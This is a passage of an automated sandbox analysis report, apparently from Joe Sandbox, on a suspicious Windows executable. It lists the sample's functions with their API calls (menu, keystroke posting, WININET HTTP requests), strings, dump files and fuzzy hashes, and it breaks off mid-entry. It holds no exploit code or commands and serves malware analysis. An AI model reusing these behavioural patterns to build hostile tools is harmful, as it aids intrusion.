                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                                                  • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                                                  • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 161812096-4108050209
                                                                                                                                                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                                                                  Function 00454014 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 93windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadMessageModuleString
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                  • API String ID: 2734547477-4153970271
                                                                                                                                                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                                                  Function 00445BE4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32 ref: 00445BF8
                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassMessageNameParentSend
                                                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                  • API String ID: 1290815626-3381328864
                                                                                                                                                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                                                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                                                                  Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                                                  • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                                                                  • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                                                  • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                                                                  Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                                                  Function 00470B6C Relevance: 13.6, APIs: 9, Instructions: 125COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1927566239-0
                                                                                                                                                                  • Opcode ID: 39db4700839c78748f1f65349aed29dd0ec4a76af68a2367c5464c8cf9b097ff
                                                                                                                                                                  • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 39db4700839c78748f1f65349aed29dd0ec4a76af68a2367c5464c8cf9b097ff
                                                                                                                                                                  • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                                                                  Function 00445E52 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                                                                                                                                                    • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                                                                                                                                                    • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00445ECB
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                                                  • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                                                                  • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                                                                  • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                                                                                                                                                  Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                                                  Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                  • String ID: @COM_EVENTOBJ
                                                                                                                                                                  • API String ID: 327565842-2228938565
                                                                                                                                                                  • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                                                                  • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                                                                  Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                                                                  • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                                                                    • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                                                                    • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                                                                  • String ID: H
                                                                                                                                                                  • API String ID: 3613100350-2852464175
                                                                                                                                                                  • Opcode ID: c6d40e7720115016f6dd6d57d99e1fbe71660f2569812f1c51c69f5f3bbdc767
                                                                                                                                                                  • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                                                                  • Opcode Fuzzy Hash: c6d40e7720115016f6dd6d57d99e1fbe71660f2569812f1c51c69f5f3bbdc767
                                                                                                                                                                  • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                                                                  Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                  • String ID: close all
                                                                                                                                                                  • API String ID: 4174999648-3243417748
                                                                                                                                                                  • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                                                                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                                                                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                                                  Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1291720006-3916222277
                                                                                                                                                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                                                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
